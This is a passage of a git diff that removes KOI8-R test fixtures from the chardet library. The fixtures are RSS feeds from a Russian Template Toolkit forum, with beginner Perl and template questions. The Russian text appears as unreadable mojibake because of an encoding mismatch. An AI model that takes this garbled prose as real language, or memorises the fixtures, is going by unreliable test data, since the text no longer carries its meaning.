http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - כֱֻ ׃ֱִֵּװ״ ְֱֱֳֹֹֻּּֿ ׃ֱװֱ ׃ ׀ֽֿֿ״ְ TT??<br /> -ׁ ׳־ֵ׃ ׳׃ֵ װֵֻ׃װֿ׳ֵ ׃װֹֻֿׂ ֹ ֱֲּֿ־ֿ׳ ׳ ֿװִֵּ״־ֵ ֱֶּ װֹ׀ֱ<br /> -messages.en<br /> -[% mess1=&quot;English1&quot; %]<br /> -[% mess2=&quot;English2&quot; %]<br /> -<br /> -messages.ru<br /> -[% mess1=&quot;עױ׃׃ֹֻ1&quot; %]<br /> -[% mess2=&quot;עױ׃׃ֹֻ2&quot; %]<br /> -<br /> -ֱ ׳ ֱּֿ־ֱָ ׃ֿֿװ׳ֵװ׃װ׳ֵ־־ֿ ׀ֿׂ׀ֹ׃ֱּ<br /> -[% IF lang == &quot;en&quot; ][% INCLUDE messages.en %][% END %]<br /> -&lt;html&gt;<br /> -[% mess1 %]<br /> -&lt;/html&gt;<br /> -ִױֱּֽ ׀ְֱִֻּֿװ״ װֹ ֱֶּ ׳ ֱ׳ֹ׃ֹֽֿ׃װֹ ֿװ ֱֻׁ ־ֿ װֱֻ ־ֵ ֱֲֿׂװֱֵװ!! םֿײֵװ ֻװֿ ־ֲֹױִ״ ׀ֿ׃ֿ׳ֵװױֵװ?<br /> -׃׀ֱ׃ֲֹֿ - - ףִֵּֿ׀װ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-113.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - Thu, 27 Oct 2005 11:48:26 GMT - נִֵׂ׃װֱ׳ֵּ־ֹׁ - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - ֻװֿ-־ֲֹױִ״ ׀ּֿ״ױֵװ view? ֵֿ־״ ױֲִֿ־ֱׁ װױֱֻ, ׃ֽױֱֵװ װּֿ״ֻֿ װֿ ֿ־ֱ ׀ֱֻֿ ׳ &quot;ֻ׃׀ֵֵֹֽׂ־װֱּ״־ֽֿ&quot; ׳ִֵֹ. יֹּ ֵֵֹֽװ ׃ּֽ ׀ּֿ״ֿ׳ֱװ״׃ׁ? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-112.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - Wed, 28 Sep 2005 15:05:48 GMT - Template Toolkit ׀ֿ winXP - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - הֲֿׂ ִֵ־״.<br /> -נִֿ׃ֱֻײֹװֵ ׀ֿײֱּױ׃װֱ &#8211; ֱֻֻ ױ׃װֱ־ֿ׳ֹװ״ Template Toolkit ׀ֿ winXP?<br /> -ס ֹ׃׀ּֿ״ױְ ActivePerl 5.8.6. <br /> -קְְֱֻּ PPM. י ־ֱ ֱִַֹּֿ ׃ PPM-ֽֿ ׳ִַֹּׁװ װֱֻ:<br /> -Ppm-&gt; install Template<br /> -Ppm-(ֿװ׳ֱֵֵװ:) &#8211; װֱַֻֿֿ ־ֱֽׁ!!! <br /> -יֹּ<br /> -Ppm-&gt; install TemplateToolkit<br /> -Ppm-(ֿװ׳ֱֵֵװ:) &#8211; װֱַֻֿֿ ־ֱֽׁ!!! <br /> -כֱֻ ֽ־ֵ ױ׃װֱ־ֿ׳ֹװ״ Template Toolkit ׀ִֿ winXp.<br /> -בֵֻּ׃ֵ - - Washington <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-110.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - Sun, 25 Sep 2005 11:50:06 GMT - fork() ׳ [% PERL %] - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - נִֿ׃ֱֻײֹװֵ, ׀ֿײֱּױ׃װֱ, ֱֻֻ ֵֻֻֿׂׂװ־ֿ ׳׀ּֿ־ֹװ״ fork() ׳ ֲֵֻּֿ [% PERL %] TT?<br /> -<br /> -נֿׂ׃װֿ ׳׀ּֿ־ֵׁװ׃ׁ ֵׂ׃ױׂ׃ֱֵֻֽֿׁ ֿ׀ֱֳֵֹׁׂ, ֱ ׀ֵׂ׳ֿ־ֱֱּ״־ֵ ֱִ־־ֵ ־ֱִֿ ׳ֿ׳ֱֱׂװ״ ֱֻֻ ֽֿײ־ֿ ֲ׃װֵֵׂ.<br /> -<br /> -ץ ֵֽ־ׁ ׳ ׀ֵֵֵֽׂ־־ֿ ׳ $stash ׃ִֵֿׂײֹװ״׃ׁ ױֱֱֻװֵּ״ ־ֱ ֻֿ־־ֵֻװ ֻ גה ֹ ֽ־ֵ ֱֻײֵװ״׃ׁ, װֿ ׃ ־ֹֽ fork ־ֵ ׃ֿ׳׃ֵֽ ֵֻֻֿׂׂװ־ֿ ֱֲֿׂװֱֵװ. פֱֵֻֿ ֿױֵ־ֵֹ, װֿ ׀ֿ ֱ׳ֵֵׂ־ֹֹ ֱֶֻֿׂ װֿװ ֻֿ־־ֵֻװ ֱֻׂ׳ֱֵװ׃ׁ. - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-109.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - Wed, 21 Sep 2005 11:45:38 GMT - TT ױֱִֵּׁװ ־ױֹּ. - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - ןֵ־״ ׃װֱׂ־־ ְַֻּ, ױײֵ ִַּֿֿ ֲ״ְ׃״, ֵֵׂ־ֹׁ ־ֵ ׳ֹײױ.<br /> -נְֱִֵֵׂ ׳ ֱֲּֿ־: <br /> -{params}-&gt;{year}-&gt;'2005';<br /> -׳ ֱֲּֿ־ֵ ׀ֹױ<br /> -[% params.year %]<br /> -<br /> -ֹ ׳ֹײױ 25! ֵ׃ֹּ ׀ֹױ 1998, ׳ֹײױ 1998, ֱ ֵ׃ֹּ ׀ֹױ 20010007, ׳ֹײױ 217!<br /> -<br /> -ֻװֿ-־ֲֹױִ״ ׃װֱֹֻּ׳ֱּ׃ׁ? ֱֻֻ ֵֹּװ״? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-108.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - Thu, 15 Sep 2005 12:41:43 GMT - eval() ׳ TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - ףױֵ׃װ׳ױֵװ ֹּ ׳ TT2 ֱ־ֱַּֿ eval() ׳ Perl? פ. ֵ. ֵ׃ֹּ ׁ ְֵֹֽ ׀ֵֵֽׂ־־ױְ ׳ ֱֲּֿ־ֵ, ־ֱֵ־ֵֹ ֻֿװֿֿׂ ׃ִֵֿׂײֹװ ִֵֹֻׂװֹ׳, װֿ ֱֻֻ ׳׃װֱ׳ֹװ״ ׳ ֱֲּֿ־ ־ֱֵ־ֵֹ װֿ ׀ֵֵֵֽׂ־־ֿ, װֲֿ ִֵֹֻׂװֹ׳ ֲֹּ ׳׀ּֿ־ֵ־, ֱ ־ֵ ׳׳ִֹֹּֿ׃״ ֱֻֻ װֵֻ׃װ? - - Dionys <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-107.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - Wed, 31 Aug 2005 11:47:31 GMT - נֱֱֵֽׂװׂ ֹ ֱֲּֿ־ֱ ׳ ֱֲּֿ־ - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - נֹׂ׳ֵװ ׳׃ֵֽ<br /> -תֱֱׂ־ֵֵ ֱֱֲִֵַּֿׂ־ ֱ ֱַֽֿׂװ־ ֿװ׳ֵװ<br /> -נֱֲֵֻּֽֿׂ װֱֱֻׁ<br /> -כֱֻ ׀ֱִֵֵׂװ״ ֹ ֱֲּֿ־ֱ ׀ֱֱֵֽׂװׂ ׳ ֱֲּֿ־<br /> -מֱ׀ֵֹֽׂׂ<br /> -[% INCLUDE tmpl(para1=&gt;value,para2=&gt;value2,...) %] - - plcgi <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-106.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - Mon, 8 Aug 2005 04:57:04 GMT - INCLUDE - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - ֱֻֻ ׀ֲֿֿׂׂ׃ֹװ״ ׀ֵֵֵֽׂ־־ױְ ׳ֿ WRAPPER ֵֵׂ ֳֵּ ֵּ׃ BLOCK...END ׳ְֵּ־־ָ ֵֵׂ INCLUDE.<br /> -׀װֱּ׃ׁ ׳ ֲֹ־ֵ׃-ֵַֹֻּֿ ֱִֵּװ״ setter-getter ־ֿ ־ֵ ֱֻ־ֱֵװ ׀ֵֽֿױװֿ, ָֿװׁ WRAPPER ׳ִֵֿׂ ֱֱֲֲֿׂװ׳ֱֵװ׃ׁ ׀ֿ׃ֵּ ׳׃ֵָ ׳ּֿײֵ־־ָ ֲֻּֿֿ׳...<br /> -<br /> -PS: PROCESS ־ֵ ׀ֱֱִֵַּׂװ״.<br /> -<br /> -PPS: ָֿֿװֱ ׳ ֱַּ׳־ֽֿ ׳ֱׂ׀׀ֵֵׂ ׳׳ִֹֿװ״ ׃ֹ׃װֵֽ־ֵֿ ׃ֲֵֿֿ־ֵֹ, ֱ ױײ ֵַֿ ֵַ־ֵֹׂװ״ ׳ֿ ׳ּֿײֵ־־ָ ֱֲּֿ־ֱָ. - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-104.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - Fri, 22 Jul 2005 12:42:52 GMT - ֱֻֻ ׃ֱִֵּװ״ ֻֿ־ֱֻװֵ־ְֱֳֹ ׃װֻֿׂ? ֹ ־ֵ ֱֲֿׂװֱֵװ i=i-1 - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - ֱֻֻ ׃ֱִֵּװ״ ֻֿ־ֱֻװֱ־ְֳֵֹ ׃װֻֿׂ? (ֿ׀ֱֵׂװֿׂ װֱֻֿ ׳ ׀ֵּׂ)<br />׃ֱֻײֵֽ, װֱֻ:<br /><br /><div class="code"><pre> -[%SET i=&quot;aaa&quot;.&quot;bbb&quot; %] - -׀ּֿױֱֵֽ: -unexpected token (.) -</pre></div><br /><br />י ֵֵ. מֵ ֱֲֿׂװֱֵװ<br /><div class="code"><pre> -[% i=i-1 %]: - -file error - parse error - articles/index.html line 32: unexpected token (-1) [% i=i-1 %] -</pre></div><br /><br />װֿ ֱֶֹ װֱֱֻׁ?<br />׳ִֵ״ [% i=i+1 %] ֱֲֿׂװֱֵװ!<br />ֱֻֻ ׁ ׀ֿ־ּׁ -- ֹ ++ ־ֵ ׃ױֵ׃װ׳ױְװ :(<br /><br />׳ֵׂ׃ֹׁ template toolkit 2.14 - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-103.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - Mon, 18 Jul 2005 06:24:54 GMT - Bug ֹֹּ Feature ? מֵ ֱֲֿׂװְֱװ $_, $! ֹ װ.׀. - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - ֱֲּֿ־:<br /> -[% PERL %]<br /> - $_ = 'test';<br /> - $stash-&gt;set(msg =&gt; $_);<br /> -[% END %]<br /> -&lt;div&gt;[% msg %]&lt;/div&gt;<br /> ---------------------<br /> -tpage --eval_perl<br /> -קֱִ£װ <br /> -Segmentation fault - - מֱֹֻּֿ םֱֻ׃ֹֽֿ׳ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-100.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - Thu, 14 Jul 2005 07:48:40 GMT - ן׀ֱֳֵֹׁׂ ִֵֵּ־ֹׁ (׳ ֱֲּֿ־ֵ) - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - מֱ׀ֵֹֽׂׂ<br /> -[% a=10 %]<br /> -[% b=5 %]<br /> -<br /> -[% c=a/b %]<br /> -<br /> -קֱִֵװ ֲֹֻֿױ. ק׃ֵ ִׂױֵַֹ ֿ׀ֱֳֵֹֹׂ ־ֱּֽֿׂ״־ֿ.<br /> -ק ֵֽ ׀ֹֹׂ־ֱ? - - ףֵֵַׂ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-99.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - Thu, 14 Jul 2005 03:03:52 GMT - Unit Tests - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - כװֿ ֹ ֱֻֻ ׀ֵֹװ UnitTest- ִּׁ ׃׳ָֹֿ ֱֲּֿ־ֿ׳.<br /> -ץ ֵֽ־ׁ ׀ֱֻֿ UnitTest-ֱֹֽ ׀ֻֿׂ׳ֱֵװ׃ׁ װּֿ״ֻֿ ֲֹ־ֵ׃ ֱַֹֻּֿ (ֻֿװֱֿׁׂ קףס ׳־ֵ׃ֵ־ֱ ׳ *.pm)<br /> -מױ ֱֻֻ ױ ׳ֱ׃ ־ֱ׃ֵװ ֶױ־ֳֹֻֿ־ֱּ״־ָ װֵ׃װֿ׳, ֿ׃ֲֵֿ־־ֿ WEB-ֹ־װֵֵֶׂ׃ֱ? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-98.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - Mon, 11 Jul 2005 08:56:40 GMT - mod_perl, ֿ׃׳ֲֿֿײֱִֵװ׃ׁ ֹּ ׀ֱֽׁװ״ ׳־ױװֹׂ ֱֲּֿ־ֱ TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - ו׃װ״ handler ־ֱ ִֽֿ׀ֵֵּׂ <br /> -׳ ֱֻׂװֳֵ.<br /> -<br /> -package My::controller;<br /> -our $c; # ֱֲַּּֿ״־ֱׁ ׀ֵֵֵֽׂ־־ֱׁ, ָ ׳ ֻֿװֽֿֿׂ ׳׃ֵ װֿ ־ֲִֵָֹֽֿֿֿ<br /> -<br /> -sub handler($$){<br /> - my $class = shift;<br /> - my $r = shift;<br /> -<br /> - $c ||= $class-&gt;new(); # ֵ׃ֹּ ױײֵ ֲּ ׃ֱִֿ־ ׀ֳֵֿׂ׃׃, װֿ ֲּֿ״ֵ ־ֵ ־ױײ־ֿ ֱִֵּװ״ new.<br /> -<br /> - $c-&gt;{t}-&gt;process(&quot;template.tmpl&quot;, $c); # ׀ֳֵֿׂ׃׃ֹֽ װֵֽ׀ֵּװ ׀ֱִֵֵׂ׳ֱׁ װֿװ ײֵ ֻֿ־װֵּּֿׂׂ ׳ ֱֵֻ׃װ׳ֵ ׀ֱֱֵֽׂװֿׂ׳.<br /> -}<br /> -<br /> -##################<br /> -# ׃ֱִֵֽֿ ֲֵֻֿװ ׳ ׀ֽׁׁװֹ<br /> -##################<br /> -sub new{<br /> - bless $self, $class<br /> -<br /> - $self-&gt;{dbh} = DBI-&gt;connect(.........); # ֱִֵֵּֽ ֻֿ־־ֵֻװ<br /> - $self-&gt;{t} = new Template(.........); # ֱִֵֵּֽ װֵֽ׀ֵּװ <br /> - $self-&gt;{cgi} = new CGI; <br /> -<br /> - $self-&gt;{site_path} = &quot;/la/bla/bla/la&quot;;<br /> - $self-&gt;{cgi_path} =&quot;/d/sfd/fs/&quot;;<br /> - return $self,<br /> -}<br /> -<br /> -<br /> -׳ ֱֲּֿ־ֵ template.tmpl<br /> -׃ְֱִֿװ׃ׁ ׀ֵֵֵֽׂ־־ֵ [% my_var = &quot;12345&quot; %]<br /> -<br /> -ֱֵֹֿװ׃ׁ ֹּ ׀ֽׁׁװ״ ֱִַֻֿ ֿװ׀ֳֵֿׂ׃׃ֹװ׃ׁ ֱֲּֿ־?<br /> -װ.ֵ. ֲױִֵװ ֹּ $c-&gt;{my_var} ׀ױ׃װֽ ׀ֹׂ ׃ִֵּױְֵֽ ֱ׀ֿׂ׃ֵ? - - trdmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-97.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - Fri, 8 Jul 2005 10:07:01 GMT - מֵ ׀ֱֻֿ׳ְֱװ״׃ׁ ׀ֱׂ׳ֹּ״־ֿ ׃װֹֻֿׂ ׳ UTF-8 ׳ֱֲׂ־ֵ ֹ ֱֲ - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - קְֱֲֹׂ ֱִ־־ֵ ֹ ֱֲ MySQL. הֱ־־ֵ ׳ UTF-8.<br />ו׃ֹּ ׃ֱִֵּװ״<br /><div class="code"><pre> -print $string_from_database; -</pre></div><br />װֿ UTF-8 ׃ֹֽ׳ּֿ ׳׳ִֿׁװ׃ׁ ׀ֱׂ׳ֹּ״־ֿ.<br />ב ֵ׃ֹּ ֵֵׂ פפ, װֿ UTF-8 ׃ֹֽ׳ּֿ ׳ ֱֱֱֱֲֲִֵֻׂׂ.<br />י װֿ ױ ֵֽ־ׁ ֱֻּּֿ״־ֿ ׀ִֿ קֹ־ִֿ,<br />־ֱ ׃ֵׂ׳ֵֵׂ ׀ִֿ א־ֹֻ׃ ׳׃ֵ ־ֱּֽֿׂ״־ֿ. - - rchumak <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-95.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - Wed, 29 Jun 2005 07:06:16 GMT - נֱֱִֵֵׂ ׀ֱֱֵֽׂװֿׂ׳ ֹ ׀ֱַֹּ־ֱ - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - דֹֻּ<br /> -@fld[$n] = ({<br /> -id =&gt; $id,<br /> -type =&gt; $type,<br /> -pr =&gt; \@f,<br /> -});<br /> -<br /> -n++<br /> -כֿ־ֳֵדֱֹֻּ<br /> -<br /> -return @fld<br /> -<br /> -<br /> -נֱֲֵּֽֿׂ ׳ װֽֿ, װֿ ֱֽ׃׃ֹ׳ @f, ױ׃װֱ־ֱ׳ֹּ׳ֱֵװ׃ׁ ִֹֿ־ ־ֱ ׳׃ֵ ֵֵּֽ־װ @fld<br /> -כֱֻ װֿ ֽֿײ־ֿ ֲֿֿװֹ? - - ףֵֵַׂ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-93.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - - - diff --git a/chardet/tests/KOI8-R/forum.template-toolkit.ru.4.xml b/chardet/tests/KOI8-R/forum.template-toolkit.ru.4.xml deleted file mode 100644 index f1504ca..0000000 --- a/chardet/tests/KOI8-R/forum.template-toolkit.ru.4.xml +++ /dev/null @@ -1,130 +0,0 @@ - - - - - זֿׂױֽ Template Toolkit : ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_forum/forum_id-4.html?rss - Template Toolkit - ֲ׃װֱׁׂ, ֽֿ־ֱׁ ֹ ֱׂ׃ֱֵֹֽׁׁׂ ׃ֹ׃װֱֵֽ ֱֲֲֿֿׂװֹֻ ֱֲּֿ־ֿ׳. מֱ ׃ֱװֵ ֱֲֿׂװֱֵװ ֶֿׂױֽ, ׳ ֻֿװֽֿֿׂ ֲֿ׃ױײְֱִװ׃ׁ ׳ֿ׀ֿׂ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ֲֲֹֹּֿװֵֹֻ ׀ֿ ֱֲֿׂװֵ ׃ ֱֲּֿ־ֱֹֽ. נִֵּֿׂײֵ־ֹׁ ׀ֿ ֱֲֿׂװֵ ֶֿׂױֱֽ. ןֱַׂ־ֱֳֹֹׁ ־ֿ׳ָ ֱֻװֵַֹֿׂ ֹ ֶֿׂױֽֿ׳. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Tue, 3 Jan 2006 08:27:57 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ֱֲּֿ־ ׳ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - Tue, 3 Jan 2006 08:27:57 GMT - ף מֿ׳ֽ חִֽֿֿ - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - נֱִֿׂ׳ְּׁ ׳׃ֵָ ׀ֿ׃ֵװֹװֵֵּ װַֿֿ ־ֲֵּֿ״ַֿֿ, ־ֿ ־ְֱִֵ׃״ ׀ֵּֿ־ַֿֿ, ׃ֱװֱ ׃ ־ֱ׃װױ׀ֹ׳ֹֽ 2006 ִַֽֿֿ! צְֱֵּ ־ֿ׳ָ װ׳ֵֿׂ׃ָֹֻ ױֱִ ֹ ־ֱִָֻֿֿ. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-123.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - Thu, 20 Jan 2005 12:10:22 GMT - XUL ֲּֿֿײֱֻ - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - הּׁ ׀ּֿ״ֿ׳ֱװֵֵּ ֲֿׂױֵֿׂ׳ Mozilla ׃ֱִֵּּ <a target="_blank" href="http://template-toolkit.ru/xul/index.xul">XUL ֲּֿֿײֻױ</a>. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-57.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - Wed, 15 Dec 2004 08:44:32 GMT - מֵ ׀ִָֹֹֿׂװ ִֻֿ ִּׁ ֱ׳ֵֵׂ־ֹׁ ֵַֹׂ׃װֱֳֹֹׂ - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - תֱִׂ׳׃װ׳ױװֵ!<br /> -<br /> -ם־ֵ ־ֵ ׀ִָֹֹֿׂװ ִֻֿ ִּׁ ֱ׳ֵֵׂ־ֹׁ ֵַֹׂ׃װֱֳֹֹׂ :(. עֵַֹ׃װֹֿׂׂ׳ֱּ׃ׁ 2 ֱֱׂ ׃ ֱׂ־ֹֽ ׀ֿװ. ֱִֵׂ׃ֱֹֽ, ־ֿ ֵֶֶֻװ ־ױֵּ׳ֿ :(. - - מֱֹֻּֿ ק. <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-44.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - Sat, 4 Dec 2004 22:08:26 GMT - RDF ׃ּױײֱֲ ֱַּֿֿ׳ֻֿ׳ - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - מֱ ֶֿׂױֵֽ ֱֲִֿ׳ֵּ־ֱ <span style="font-weight:bold">RDF ׃ּױײֱֲ ֱַּֿֿ׳ֻֿ׳</span>. װֱ ׃ּױײֱֲ ַֿװֿ׳ֹװ ֱֶּ ׃ ֱַּֿֿ׳ֱֹֻֽ ־ֿ׳ָ װֵֽ, ֿװֻׂװָ ׳ ֶֿׂױֱָֽ, ׳ ֱֶֽֿׂװֵ XML/RDF. ף ׀ֽֿֿ״ְ RDF ׃ּױײֲ ֽֿײ־ֿ ֱַֿׂ־ֹֿ׳ֱװ״ ׀ִֿ׀ֹ׃ֻױ ־ֱ ־ֿ׳ֵ װֵֽ, ֿװֻׂװֵ ׳ ֶֿׂױֱָֽ.<br /><br />ק ־ֱ׃װֹֿׁ ֵֽֽֿ־װ ִֿ׃װױ׀־ ׃ִֵּױְֵֹ ׀ִֿ׀ֹ׃ֹֻ <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_1.rdf">ת־ֱֻֽֿ׃װ׳ֿ ׃ Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_6.rdf">מֿ׳ֿ׃װֹ Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_4.rdf">ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ</a>.<br /><br />הּׁ ֿװ׃ֵּײֹ׳ֱ־ֹׁ ־ֿ׳ָ װֵֽ ֹ װֵ־ֹׁ ֱַּֿֿ׳ֻֿ׳ ֽֿײ־ֿ ֹ׃׀ּֿ״ֿ׳ֱװ״ ׃׀ֱֳֵֹּ״־ֵ ׀ֱַֽֽֿׂׂ ֹ ׃ּױײֲ, ־ֱ׀ֵֹֽׂׂ: <a target="_blank" href="http://www.activerefresh.com/">Abilon</a>, <a target="_blank" href="http://www.feedreader.com/">FeedReader</a>, <a target="_blank" href="http://www.yole.ru/projects/syndirella/">Syndirella</a>, <a target="_blank" href="http://blogspace.com/rss/readers">RSS Readers</a>, <a target="_blank" href="http://www.watznew.com/">WatzNew</a>.<br /><br />נּֿ״ֿ׳ֱװֵֹּ ֲֿׂױֱֵׂ <span style="font-weight:bold"><span style="color: orange">Firefox</span></span> (׳ֵׂ׃ֹֹ 0.8 ֹ ׃װֱֵׂ) װֱֻײֵ ַֽֿױװ ־ֱ׃װֹֿׂװ״ ׀ִֿ׀ֹ׃ֻױ ֵֵׂ <span style="font-weight:bold">Live Bookmark</span>. הּׁ װַֿֿ ־ױײ־ֿ ֱװֹ ׳ ׳ֱֲׂ־־ ֶֿׂױֽ (־ֱ׀ֵֹֽׂׂ, <a target="_blank" href="http://forum.template-toolkit.ru/view_forum/forum_id-6.html">מֿ׳ֿ׃װֹ Template Toolkit</a>). ק ־ֹײ־ֵֽ ׀ֱׂ׳ֽֿ ױַּױ ֲֿׂױֱֵׂ ׀ֿׁ׳ֹװ׃ׁ ־ֱֻֿ <img src="http://forum.template-toolkit.ru/attachments/000/138/138/rdf.gif" alt="RDF" />. הֿ׃װֱװֿ־ֿ ֵֻּ־ױװ״ ׀ֿ ־ֱֻױ ֹ ֱֲִֿ׳ֹװ״ ׀ִֿ׀ֹ׃ֻױ ׳ ֱֱִֹֻֻּ. נֿ׃ֵּ װַֿֿ ׳ ֱֱֱִָֻֻּ ׀ֿׁ׳ֹװ׃ׁ 